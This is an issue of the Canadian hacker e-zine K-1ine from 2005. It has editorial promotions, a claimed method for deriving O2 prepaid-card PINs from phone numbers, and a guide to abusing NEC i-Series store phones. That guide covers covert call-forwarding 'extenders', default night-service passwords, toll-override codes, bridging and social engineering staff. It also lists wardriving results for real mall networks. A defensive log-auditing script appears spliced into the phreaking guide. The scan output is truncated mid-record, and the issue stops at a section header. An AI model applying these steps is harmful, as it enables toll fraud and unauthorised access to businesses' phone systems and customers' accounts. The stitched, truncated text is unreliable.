##############################################################################
##############################################################################

                              SIX F*CKING YEARS

                              ** SPRING 2005 **

##############################################################################
##############################################################################

O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

                               . randOm wOrds .

  Introduction  . . . . . . . . . . . . . . . . . . . . . . . The Clone
  Contact Information . . . . . . . . . . . . . . . . . . . . The Clone
  Link of the Quarter . . . . . . . . . . . . . . . . . . . . The Clone
  K-1ine Mirrors  . . . . . . . . . . . . . . . . . . . . . . The Clone
  Nettwerked Radio  . . . . . . . . . . . . . . . . . . . . . The Clone
  780 Records Corp  . . . . . . . . . . . . . . . . . . . . . The Clone
  Voodoo Magick Boxes . . . . . . . . . . . . . . . . . . . . The Clone
  K-1ine Goes Wheneverly  . . . . . . . . . . . . . . . . . . Nettwerked

                                  dOcuments

  O2 - PREPA1D CARD P1N PHREAK1N F0R THE MASSES . . . . . . . Acid Data
  Phreaking the NEC i-Series phone systems  . . . . . . . . . War
  West Ed Mall Wifi Scan: Revisited . . . . . . . . . . . . . Fr0st
  Undressing Cryptography . . . . . . . . . . . . . . . . . . Aestetix
  The Guide to Using Google to Get Free Confz . . . . . . . . Aftermath
  The Inevitable Crash of Society . . . . . . . . . . . . . . Cyburnetiks
  Datapac Hacker's Kit: DataCrack Source Code . . . . . . . . Aftermath
  Datapac Hacker's Kit: DataSkan Source Code  . . . . . . . . Aftermath
  If I Were President . . . . . . . . . . . . . . . . . . . . DoobieEx
  Awstats exploit "shell" . . . . . . . . . . . . . . . . . . Omin0us
  How to brute force MSSQL  . . . . . . . . . . . . . . . . . H4v3n
  SQL Brute Source Code . . . . . . . . . . . . . . . . . . . H4v3n

                                  cOnclusiOn

  Credits . . . . . . . . . . . . . . . . . . . . . . . . . . The Clone
  Shouts  . . . . . . . . . . . . . . . . . . . . . . . . . . The Clone

O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

Introduction:

It was May 22nd 1999 and K-1ine magazine had survived its one month
anniversary. A new idea of mine had spawned out of boredom, and I felt it was
time to test it out. That idea was Nettwerked. The idea was that Nettwerked
would, over time, act as this country's top Internet phone phreaking resource.

At this point Nettwerked was nothing but a few low-tech hacking articles, some
of my own hand scans, and a few miscellaneous articles I wrote on telecom
systems. It wasn't much but it definitely was better than the unbearable
"boxing" sites with ripped off articles from LOD (Legion of Doom) technical
journals. One thing I definitely didn't want was to make Nettwerked one of
those sites. They lacked originality, creativity, and quite frankly A FUCKING
CLUE about the current (POTS/VOIP) telephone networks.

Nettwerked soon grew with my own wacky and wild phreaking articles, and
naturally the outside contribution of phreaking articles to this site also
grew. Before I knew it Nettwerked filled itself with over 100
telecommunications related articles, forty-something issues of K-1ine
Magazine, Elcotel Research (an insanely large research project into
Elcotel-based COCOT Payphones), Flex Technology Research, a popular discussion
board, a monthly Nettwerked Meetings page, and a weekend Radio Show.

It's been 6 years. This love child of mine, Nettwerked, has had its growing
pains, was nearly shut down after fears (see: paranoia) of a post-Bush New
World Order (thanks H410g3n for convincing me it was a bad idea), and has
grown into a large community of friends who share a common goal; learning as
much as possible about technology - at all costs.

Thank you to everyone who has made this dream into a reality.
I look forward to sharing another 6 years and more with you all through
Nettwerked, K-1ine, Hack Canada, and any other Internet project/site that may
just happen to pop up in the future.

Remember though, all of this is only made possible by contribution. Without
people giving a shit Nettwerked would cease to exist. Contribute your original
files to Nettwerked/Hack Canada/K-1ine, contribute your original music to
Nettwerked Radio, discuss technology on the discussion board, come to our
meetings, buy a Voodoo Magick Box, link to the web-site. That is how *you*
support our thriving Canadian H/P scene!

Enjoy the Spring Issue of K-1ine (#47)... Six F*cking Years!

Power to the people.

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

Contact Information;

|*> Comments/Questions/Submissions: theclone@hackcanada.com

|*> Check out my site: (Nettwerked) http://www.nettwerked.net

|*> Check out the Web-forum: http://board.nettwerked.net/

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

Link of the Quarter:

Every quarter I post one really great "link of the quarter" on each issue of
K-1ine magazine. The link can be anything in the technology industry, music
scene, rave scene, punk scene, or even a good article you read on a news site.
I'll be taking submissions via e-mail or IRC right away; so get your links in
and maybe you'll see it in the next issue of K-1ine!

For the Spring 2005 issue of K-1ine, the link of the quarter is:

http://www.phreakvidz.com

Featuring full length telephone phreaking videos such as Kevin Poulsen on
'Unsolved Mysteries', 'Central Office Tour Video', and lastly the Masters of
Deception's 'Phiber Optik' in a documentary called 'Unauthorized Access'.

Submitted by: The Clone

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

K-1ine Magazine Mirrors:

WIRETAPPED

"Wiretapped.net is an archive of open source software, informational textfiles
and radio/conference broadcasts covering the areas of network and information
security, network operations, host integrity, cryptography and privacy, among
others. We believe we are now the largest archive of this type of software and
information, hosting in excess of 20 gigabytes of information mirrored from
around the world."

Now mirrored in two places, one in Belgium and another in Sydney.

http://www.mirrors.wiretapped.net/security/info/textfiles/k1ine/

HACK CANADA

"Hack Canada is the source for Canadian hacking, phreaking, freedom, privacy,
and related information."

http://www.hackcanada.com/canadian/zines/k_1ine/index.html

SECURITY-CORE

"Security-Core mirrors K-1ine.. and that's about it so far."

http://security-core.com/modules.php?op=modload&name=Downloads&file=index&req=viewdownload&cid=5

.: (.dtors) :.

"we look good... in our new town" - Omin0us' Security website

http://dtors.ath.cx/index.php?page=k1ine

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

Nettwerked Radio (Undergr0und Radio and Music every weekend!):

Tune into this critically acclaimed radio show on:
Saturday and Sunday from: 12:00am - 3:00am (MST).

To listen, please tune in to: http://68.151.33.191:8000/listen.pls

If you're not sure whether the show is on, just visit nettwerked.net, and look
at the Radio section. If you see lime green "ONLINE", then we are live. You
can listen in using Winamp, XMMS, or anything that will play Winamp streaming
audio.

We thank you for your support and hope that you tune in, give your feedback,
and make those requests!

--------------------------------------------------------
Contribute your music to Nettwerked Radio, and be heard:
--------------------------------------------------------

Do you have your own band?
Are you a solo artist? Do you make your own music on your computer, or with
regular instruments? Be heard!

Nettwerked Radio, on from 12AM-3AM (MST) every Saturday and Sunday, is now
accepting submissions of YOUR original music for play. We accept MP3 or OGG
formats. If you submit your music, be sure to include information on the band,
and any information; such as location, and history. Nettwerked Radio will play
your music and advertise your artist information!

Nettwerked Radio is a great way to be heard without having to pay out for
advertising, or passing out flyers, etc. We respect your copyright too. We
will only play your songs when you want them played. We will not duplicate,
share or otherwise pirate your songs.

All interested artists please send your music and information to:
the.clone@gmail.com

For more information visit: http://www.nettwerked.net/radio/

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

780 Records Corporation... from the people who brought you Nettwerked Radio.

780 Records Corporation is a 100% independent record label focused on helping
independent, signed and unsigned artists get a voice. We are helping artists
who produce music in various genres (punk, rock, electronic, etc.) sell and
distribute their music to the global scene.

At 780 Records Corporation we believe strongly in an artist's ability to make
a living, and control their music. This is a challenging thing in a world
where large music labels do the exact opposite. As a record label, we will
promote your music, your CDs, and more. Our contracts plan to be about freedom
for the artist (unlike many of the large labels you see out there who control
the lives of the artists), and about being heard. Nothing is more important to
us than that.

We have unofficially adopted Google's famous business slogan: "Don't be evil".
We feel "Don't be evil" is not only an important part of business, but an
important part of life in general.

780 Records Corporation is also a supporter of 'Downhill Battle', a non-profit
organization working to support participatory culture and build a fairer music
industry. We plan to contribute free banner space, and donations to this very
important organization who really do help independent artists across the
globe. (Downhill Battle is available at: http://www.downhillbattle.org)

For more information on 780 Records, or to find out how you can be a part of
780 Records visit: http://780.digaserve.com (soon to be
http://www.780Records.com).

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

Voodoo Magick Boxes:

Voodoo Liquidation! - Nettwerked.net is pleased to announce the return of the
Voodoo Magick Boxes! We are selling off the last of these fine machines, and
with a fine price tag. We're selling for 50% less than their original cost!

Buy a Voodoo Machine now: http://www.nettwerked.net/voodoo.html

Price: $50.00 (US) + $12.00 (US) shipping.

We accept PayPal as a main form of payment, but we also accept Paystone as a
payment processor. For questions, please contact: theclone@hackcanada.com.

Thank you for your interest in this incredible "wetware" product, and we hope
you purchase one soon.

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

Nettwerked.net: K-1ine magazine goes wheneverly

[ For Immediate Release ]

Thursday, May 12, 2005: - Edmonton, Alberta -- In a decision that is sure to
make headlines, Nettwerked has announced that 'K-1ine', Canada's longest
running hacker, phreak, electronics, and political magazine has been turned
into one that will now be published wheneverly.

In its beginning, K-1ine initially started out as a magazine that was released
whenever its only editor and major writer, The Clone, had the time to piece
the beautiful ascii art filled digital pages with everything that an
underground publication should have.
However, after approximately one year, K-1ine quickly grew into a magazine
that had many contributing writers and artists, so The Clone decided that
keeping K-1ine as a release that came out rarely certainly was not going to
cut it for his readers. He wanted to have something that all HackCanada.com /
Nettwerked.net visitors could look forward to once a month. So in July of
2000, K-1ine turned into a monthly release, and stayed that way until three
years later in the summer of two-thousand and three when K-1ine went
quarterly.

And now it seems we have to go wheneverly. What does that mean? It means we'll
release issues whenever we feel we have received an acceptable amount of
article submissions. Why? Well in the past several months it has become
increasingly difficult to gather enough high quality articles within a quarter
to justify a K-1ine release. We feel this is the only way we can keep K-1ine
from going under.

Much like Phrack Magazine in the United States eventually did, K-1ine will
most likely have 'zine issue releases once or twice a year after the Spring
2005, K-1ine #47 release. We hope with this more laid back approach to K-1ine,
we can make K-1ine even more high quality, and of course more special.

Starting after #47, K-1ine will follow the newly implemented wheneverly
format, and will contain all the great articles and stories that you've grown
to love from the magazine that changed the face of the Canadian hacking /
phreaking scene forever. With the gathering of issues over a longer period of
time, we hope this means K-1ine's wheneverly releases are much larger, and
more elite than the previous quarterly issues.

Upcoming Issues:

* Whenever 200X: K-1ine 48
* Whenever 200X: K-1ine 49
* Whenever 200X: K-1ine 50 (50TH ANNIVERSARY ISSUE - promotional items
  included)

Sincerely,

The Clone (Editor-In-Chief)

--

Forward Looking Statements:

The Nettwerked.net website contains forward looking statements that are based
upon current expectations.
Actual results could differ materially from those projected in the forward
looking statements as a result of various risks and uncertainties including,
among others, the timely introduction and acceptance of new products, costs
associated with new product introductions, the transition of products to new
hardware configurations and platforms and other factors, including those
discussed in Nettwerked's annual and quarterly reports on file with the Kanada
R3venue /\gency. This information should be read in conjunction with
Nettwerked's most recent Registration Statement on phile with the Kanada
R3venue /\gency, which contains a more detailed discussion of Nettwerked's
business including risks and uncertainties that may affect future results;
such as the fucking apocalypse. Nettwerked does not undertake to update any
forward looking statements, because quite frankly we are lazy.

This document is Copyright (c) 2005, Nettwerked. All Rights Preserved in
M.S.G.

                                     ###

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

bbiab, things to do, people to screw
family?

                 a c i d d a t a . n e t   p r e s e n t s

             [ O2 - PREPA1D CARD P1N PHREAK1N F0R THE MASSES ]

                              _____________
                             |  ___        |
                             | |___|  O2   |
                             |___________/

                               O2 can do ..

[ Intro ]

A few weeks ago I bought a new o2 ( o2-online.de ) prepaid card. I deliberated
if it is possible to get the pin from my phone number and I looked a while on
my number and after a while I saw something interesting.

[ Pin & phone number ]

I add the two last 3-digit numbers together and after this I got a 4-digit
number - my pin. Here is the simple turn:
( with a changed phone number just for example )

   the number: 0176 12 424 754
   add it:     424 + 754
   the pin:    1178

[ Last words ]

I don't know if this is a coincidence but I don't believe that. Anyway the two
3-digit numbers, when you add them, must become a 4-digit number so the range
of numbers in this case is minimal.
O2 also has different numbers like 0179 and so on as prefix number, with other
different simple ways maybe, I don't know.. phreak it out and change your pin.
(-;

[ Greetings ]

Greetings are going out to Security-AG, Koksclan.de, sm0g23er, Simoni, Jay-K,
D-Nought and all my other good friends.

                    a c i d d a t a . n e t   2 0 0 5

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

i caused an accident once
in your pants

                  Phreaking the NEC i-Series phone systems
                                   by war

The i-Series of desktop fones are manufactured by NEC. The i-Series includes
the 28i, 124i and 384i phones. These phones were built by NEC for use in an
office environment, and they perform satisfactorily in that role. NEC i-Series
phones are used by a number of small and large businesses in North America.

This article might, possibly, hopefully, give you some insight into power-use
(or phreaking, whatever) of the i-Series fones. That's the idea, anyways. I'm
assuming a previous basic knowledge of how PBX systems work.

The i-Series phones have quite a large array of features, too large to explain
every feature in detail in one article. A quick overview of some of the
i-Series features:

   Alarm
   Automated Attendant (Voice Announcer)
   Background Music
   Barge In (Emergency Interrupt-ish)
   Call Forwarding
      Follow-me
      Off-Premise
   DND Override
   Call Waiting/Camp On
   Conferencing
   MeetMe Internal/External Conferencing
   MeetMe Internal/External Paging
   Directory Dialing
   Internal/External Paging
   Programmable Function Keys
   Soft Keys (on select models)
   Reverse Voice Over
   Room Monitoring
   Tandem Trunking
   Voice Mail

Physical Access

As the topic says, let's first assume you have physical access to the actual
phone. So, you may ask, "How do I gain physical access?" It's not that hard,
really. If you spot an i-Series phone in a shop, you could simply ask them,
"Can I use your phone?" It's not hard.

So. Let's look at a couple useful features of the wonderful i-Series fone
system.

Call Forwarding

Probably one of the most useful (in-my-opinion) options on the i-Series phones
is the "Call-Forwarding" feature and Call-Forwarding Off-Premise feature. The
i-Series phones have quite a few options when it comes to call-forwarding. You
can forward your calls to voicemail, forward your calls to another extension,
or forward to an external number. Call-forwarding also ties in with the
Do-Not-Disturb (DND) functions of the phone.

Call-Forwarding

There are a couple call-forwarding modes. They are:

   Call-Forwarding when Busy or Not-Answered
   Call-Forwarding Immediate
      - immediately forwards your call using the given method without ringing
        the line at all
   Call-Forwarding when Not Answered
   Call-Forwarding Immediate with Both Ringing
      - immediately forwards your call using the given method, but still rings
        your line.
   Call-Forwarding to Voice Mail

If you needed to activate call-forwarding on an i-Series phone (once again
assuming physical access), simply dial:

   1. [*] + [2]
   2. Dial Call Forwarding condition:
         1 - VoiceMail
         2 - Busy or Not Answered
         4 - Immediate
         6 - Not Answered
         7 - Immediate with Both Ringing
         0 - Cancel Call-Forwarding
   3. Then dial the extension, Voice Mail master number, or simply press the
      [Voice Mail] programmable key (if there is one.)
   4. Dial Call Forwarding Type
         2 - All calls
         3 - Outside calls only
         4 - Intercom calls only

So, overall, if you wanted to say...forward all your calls immediately to
extension 555, you would dial:

   [*][2] + [4] + [5][5][5] + [2] + hangup

Call-Forwarding Off-Premise

Call-Forwarding Off-Premise can be used to forward your calls to another
number. There are quite a few different ways to exploit this feature, assuming
local access at an i-Series fone. To turn on Call-Forwarding Off-Premise,
dial:

   1. [*] + [2]
   2. [6] + Dial line access code
      {
      Line access codes are:

      [9] Automatic Route Selection (ARS) / Trunk Group Routing
         Dialing "9" for an outside line is probably the most common way known
         by people using PBX systems to get an outside line. "9" is the
         extension commonly designated for Automatic Route Selection - the
         fone system chooses what line you are going to use for you.

      [8][0][4] + Line Group (1-9 , 01-99, 001-128)
         804x dialing is Line Group Selection dialing. You can manually select
         the outgoing trunk group that you want your call to be placed via.
         For example, if there is more than one business in your office, you
         might have a trunk group "1" for the "ABC Packaging Corp", and a
         trunk group "2" for the "BCD Shipping Co." If you were calling out
         using "9" on a phone belonging to the "BCD Shipping Co.", you would
         be actually dialing "8042". That would route you onto the BCD
         Shipping Co. trunk group. But, you could also theoretically dial
         "8041" to make an outgoing call over the trunk group assigned to ABC
         Packaging. (I hope that makes sense).

      [#][9] + Line Number Selection
         You can select an absolute line using "#9". You could dial "#9" +
         "05" to get line number 05.
      }
   3. Then dial the external number where you want your calls to be forwarded.
   4. Hangup.

Call-Forwarding Off-Premises is a quick-n-dirty way to get an overnight
extender. If you were to walk up to a Future Shop employee, and ask them to
use their phone, you might be able to set it to Call-Forward Off-Premises.
But, chances are that it would be noticed the next day. If you want to
maximize the length of time before the Call-Forwarding is removed, there are
options to be considered.

Forward to the Operator.
   If you're forwarding to the operator, and then getting him/her to place the
   call, you aren't going to be endangering your favorite bridge or your
   friend.

Find a remote phone that rarely receives calls.
   In large retail outlets (Future Shop, Best Buy, Canadian Tire, etc) there
   are often departments that are lower traffic than others. For example,
   appliances. How many people go to Future Shop to buy appliances? None, you
   say? Well then, if you're going to pick a fone to set up as an extender,
   might I suggest you use a phone in the appliance department? Chances are,
   it's going to receive less traffic which means less chance of your extender
   getting taken down.

+++

Forced Trunk Disconnection

While still on the physical access topic...Forced Trunk Disconnection. If for
any unknown reason, you needed to release a line, simply dial up the line
using:

   [#][9] + line number (ie 01, 02, 03, 005, whatever) + [*][3]

That will disconnect (read: abruptly terminate) the connection. I'm sure you
can figure out a good use for that.

+++

Night Service Mode

Ever find a nice afterhours voicemail system that you just can't wait until
the evening to play with? Even if it means cutting off legitimate users? No,
me either. But, with Night Service Mode, you can do just that.

Switching to Night Service Mode during the daylight hours, especially in a
busy store, usually makes incoming callers upset. People calling in get
voicemail. And such. But, it's a convenient (for you) way in a pinch to get
access to an afterhours system.

To physically turn on Night Service Mode from a phone, just dial:

   1. [8][1][8] + Night Service Password
      The default Night Service Password is "0000".
   2. Dial the Night Service Mode
         0 Day mode
         1 Night mode
         2 Midnight mode
         3 Rest mode
         4 Day 2 mode
         5 Night 2 mode
         6 Midnight 2 mode
         7 Rest 2 mode

So, to turn on Night Service Night Mode during the day at your (least?)
favorite local Staples (or whatever uses i-Series) simply dial:

   [8][1][8] + [0][0][0][0] + [1]

That is, of course, assuming the password is default.

+++

Outgoing Calls

Some i-Series phone systems have toll restrictions.
To override toll restrictions, simply dial:

   [8][7][5] + Password

As well, some systems that use ARS (Automatic Route Selection) are coded. Many
larger companies like Nortel that have high volumes of calling often code
their PBX systems so that calls can be catalogued effectively, and to
discourage over-use and fraudulent use. If the system you are using uses coded
ARS, when you dial "9", you'll get a dialtone and can dial your number as
normal. But, after you have dialed the number, you will be dropped to another
dialtone and will have to enter the ARS code.

+++

Bridging and Social Engineering

Bridging is the act of placing two outside callers in a conference call, and
then dropping out of the call. Let's say that two of your phreak buddies
decide that they want to talk. But, maybe they don't want to pay for it.
Simple enough. You just walk down to your local K-Mart, and find a remote
phone. Then, wait for one of your buddies to call up the local K-Mart's 800
number and ring your phone. When he does, simply press the [Conf] button on
your i-Series phone. Then, wait for your second buddy to ring your line. When
he does, press [Conf] twice. This will connect the two parties. To drop out of
the conference and leave the two parties talking, simply press
[HOLD] + [#][8].

Now on the other side of the coin. Many companies set up tandem trunking
conferences to allow outside employees such as service technicians or other
field workers to talk to each other. You could social engineer a secretary
into creating a bridging line to talk on. If she doesn't know how, now you can
walk her through it, since you know. Many secretaries also refer to bridging
conferences as "Tandem Conferences", "Tandem Trunking Lines", or something
similar to that.

[ BlackRatchet wants to remind you that a 'Tandem Trunking Line' is not a
  technical term. A trunk and a line are different. Not the same. He really,
  REALLY wanted me to note that. So here it is. ]

+++

That's about it.
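
Seen from the PBX administrator's side, the feature codes listed in the article
above can be picked out of station dialing records. The following is an added
example, not part of the original article and not NEC tooling. The record
format (time, station, dialed digits), the station-to-trunk-group table, the
digit widths, the 4-digit password length and the business hours are
assumptions, and the sample records are constructed.

```python
"""Flag the NEC i-Series feature codes from the article in dialed-digit logs."""
import re
from typing import NamedTuple, Optional

# Codes exactly as listed in the article.
FWD_CONDITIONS = {"1": "voice mail", "2": "busy or not answered", "4": "immediate",
                  "6": "not answered", "7": "immediate with both ringing"}
FWD_TYPES = {"2": "all calls", "3": "outside calls only", "4": "intercom calls only"}
NIGHT_MODES = ["day", "night", "midnight", "rest",
               "day 2", "night 2", "midnight 2", "rest 2"]
DEFAULT_NIGHT_PASSWORD = "0000"

# Site assumptions, not from the article.
GROUP_DIGITS = 1               # "804" + one-digit line group (8041, 8042)
LINE_DIGITS = 2                # "#9" + two-digit line number (#9 05)
BUSINESS_HOURS = range(8, 18)  # 08:00-17:59


class Finding(NamedTuple):
    station: str
    event: str
    severity: str
    detail: str


def line_access(digits: str) -> str:
    """Return the line access code that starts `digits`, or '' if none."""
    m = re.match(rf"9|804\d{{{GROUP_DIGITS}}}|#9\d{{{LINE_DIGITS}}}", digits)
    return m.group(0) if m else ""


def classify(station, hour, digits, home_group) -> Optional[Finding]:
    """Map one dialed string to a finding, or None for ordinary dialing."""
    if digits.startswith("*2") and len(digits) > 2:
        cond, rest = digits[2], digits[3:]
        access = line_access(rest)
        if cond == "6" and access:
            # *2 6 is followed by a line access code only for Off-Premise; an
            # extension that begins with 9 would also match and gets flagged.
            return Finding(station, "forward-off-premise", "high",
                           f"via {access} to {rest[len(access):]}")
        if cond in FWD_CONDITIONS and rest and rest[-1] in FWD_TYPES:
            return Finding(station, "forward-internal", "low",
                           f"{FWD_CONDITIONS[cond]} to {rest[:-1]} "
                           f"({FWD_TYPES[rest[-1]]})")
        return None
    m = re.fullmatch(r"818(\d{4})([0-7])", digits)
    if m:
        mode = int(m.group(2))
        notes = [f"mode set to {NIGHT_MODES[mode]}"]
        if m.group(1) == DEFAULT_NIGHT_PASSWORD:
            notes.append("default password")
        if mode != 0 and hour in BUSINESS_HOURS:
            notes.append("during business hours")
        return Finding(station, "night-service-change",
                       "high" if len(notes) > 1 else "medium", ", ".join(notes))
    if digits.startswith("875"):
        return Finding(station, "toll-override", "high", "override code dialed")
    m = re.fullmatch(rf"#9(\d{{{LINE_DIGITS}}})\*3", digits)
    if m:
        return Finding(station, "forced-trunk-disconnect", "medium",
                       f"line {m.group(1)} released")
    m = re.match(rf"804(\d{{{GROUP_DIGITS}}})", digits)
    if m and int(m.group(1)) != home_group:
        return Finding(station, "foreign-trunk-group", "medium",
                       f"line group {m.group(1)}, home group {home_group}")
    return None


def audit(log_text: str, station_groups: dict) -> list:
    """Parse 'HH:MM station digits' records and return all findings."""
    findings = []
    for line in log_text.strip().splitlines():
        clock, station, digits = line.split()
        hit = classify(station, int(clock[:2]), digits, station_groups.get(station))
        if hit:
            findings.append(hit)
    return findings


# Constructed sample records; stations, numbers and passwords are made up.
SAMPLE_LOG = """
09:02 214 *245552
13:47 231 *26917805550100
14:05 231 81800001
14:20 305 80417805550111
15:10 305 #905*3
16:30 214 87512345
17:00 214 97805550123
"""
STATION_GROUPS = {"214": 2, "231": 2, "305": 2}  # constructed

if __name__ == "__main__":
    for f in audit(SAMPLE_LOG, STATION_GROUPS):
        print(f"{f.severity:6} ext {f.station} {f.event}: {f.detail}")
```

A Night Service change made with the default "0000" password is reported as
high severity whatever the hour, since it shows the default was never changed.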

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

what the FUCK is a sex token??/
you're too young! cover eyes
lol
* Cygnus opens eyes!!
hehe
Cygnus: for peep shows, et al
Cygnus - it's when a mommy loves a daddy and he puts his bird into her bee
lol
clone, stfu

               ################################################
               #                                              #
               #      West Ed Mall Wifi Scan: Revisited       #
               #              Article By: fr0st               #
               #       Original Article By: cybersk4nk        #
               #   Contact Info: fr0sty (at) shaw (dot) ca    #
               #        http://blondebomber.no-ip.com         #
               #                                              #
               ################################################

After reading the original article by cybersk4nk, I knew I had to do a
follow-up so here it is.

The Story:

I decided to start my adventure of the war walk in Starbucks that is located
in and beside Chapters in West Edmonton Mall. Sitting in the Starbucks gave me
a little time to get everything working and everything set up. So I put my
laptop into my bag and off I went.

The Setup:

The laptop I was using for this WiFi scan was an IBM ThinkPad T21, running
FreeBSD 5.3, Kismet 2005 01 R1, with a prism2.5 SMC2532W-B. The SMC2532W-B is
a 200mW card, and let me tell you, this card packs a lot of power.
The Results: Network 1: "3dbcamwireless" BSSID: "00:40:05:55:17:45" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 08 WEP : "Yes" Maxrate : 22.0 LLC : 2 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 2 First : "Wed Mar 30 05:15:41 2005" Last : "Wed Mar 30 06:02:12 2005" Network 2: "5356ep" BSSID: "00:0F:C8:00:15:13" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 11 WEP : "Yes" Maxrate : 36.0 LLC : 5 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 5 First : "Wed Mar 30 05:17:26 2005" Last : "Wed Mar 30 06:02:10 2005" Network 3: "linksys" BSSID: "00:0F:66:90:CE:9A" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "Yes" Maxrate : 0.0 LLC : 3 Data : 1 Crypt : 1 Weak : 0 Dupe IV : 0 Total : 4 First : "Wed Mar 30 05:17:28 2005" Last : "Wed Mar 30 05:46:38 2005" Network 4: "linksys" BSSID: "00:0E:35:79:D0:DE" Type : unknown Carrier : 802.11b Info : "None" Channel : 00 WEP : "No" Maxrate : 18.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 05:17:29 2005" Last : "Wed Mar 30 05:17:30 2005" Network 5: "" BSSID: "00:06:B1:14:3C:AB" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "No" Maxrate : 11.0 LLC : 17 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 17 First : "Wed Mar 30 05:17:32 2005" Last : "Wed Mar 30 06:03:44 2005" Network 6: "111" BSSID: "00:0F:66:D6:5C:FC" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "Yes" Maxrate : 54.0 LLC : 8 Data : 1 Crypt : 1 Weak : 0 Dupe IV : 0 Total : 9 First : "Wed Mar 30 05:18:34 2005" Last : "Wed Mar 30 06:04:34 2005" Network 7: "GdbuzzAP" BSSID: "00:09:5B:AA:07:A8" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 10 WEP : "Yes" Maxrate : 0.0 LLC : 2 Data : 1 Crypt : 1 Weak : 0 Dupe IV : 0 Total : 3 First : "Wed Mar 30 05:18:50 2005" Last : "Wed Mar 30 06:05:08 2005" Network 8: "" BSSID: "00:06:B1:14:44:EF" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 02 WEP : 
"No" Maxrate : 11.0 LLC : 25 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 25 First : "Wed Mar 30 05:19:02 2005" Last : "Wed Mar 30 06:08:26 2005" Network 9: "linksys" BSSID: "00:06:25:98:7A:0C" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 15 Data : 1 Crypt : 1 Weak : 0 Dupe IV : 0 Total : 16 First : "Wed Mar 30 05:20:39 2005" Last : "Wed Mar 30 06:08:37 2005" Network 10: "default" BSSID: "00:0D:88:2F:F1:A7" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 03 WEP : "Yes" Maxrate : 11.0 LLC : 4 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 4 First : "Wed Mar 30 05:24:05 2005" Last : "Wed Mar 30 05:37:06 2005" Network 11: "151" BSSID: "00:A0:F8:46:6A:BB" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 01 WEP : "Yes" Maxrate : 11.0 LLC : 5 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 5 First : "Wed Mar 30 05:24:49 2005" Last : "Wed Mar 30 05:35:44 2005" Network 12: "WEMiSphere" BSSID: "00:0F:C8:00:15:28" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 01 WEP : "No" Maxrate : 36.0 LLC : 9 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 9 First : "Wed Mar 30 05:25:19 2005" Last : "Wed Mar 30 05:35:52 2005" Network 13: "FLHGuest" BSSID: "00:0F:C8:00:15:29" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 01 WEP : "No" Maxrate : 36.0 LLC : 9 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 9 First : "Wed Mar 30 05:25:20 2005" Last : "Wed Mar 30 05:35:50 2005" Network 14: "WEM_Conference" BSSID: "00:0F:C8:00:15:2A" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 01 WEP : "No" Maxrate : 36.0 LLC : 9 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 9 First : "Wed Mar 30 05:25:20 2005" Last : "Wed Mar 30 05:35:50 2005" Network 15: "SMC" BSSID: "00:04:E2:94:5E:14" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "No" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 05:26:15 
Total Networks Found: 62

This is my first article for K-1ine, I hope you all enjoyed.

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

"9/10 doctors use Windows. When life support is on the line; who cares?
 Risks make life fun" - A message from the Government of Canada

                  +-----------------------------------+
                  |      Undressing Cryptography      |
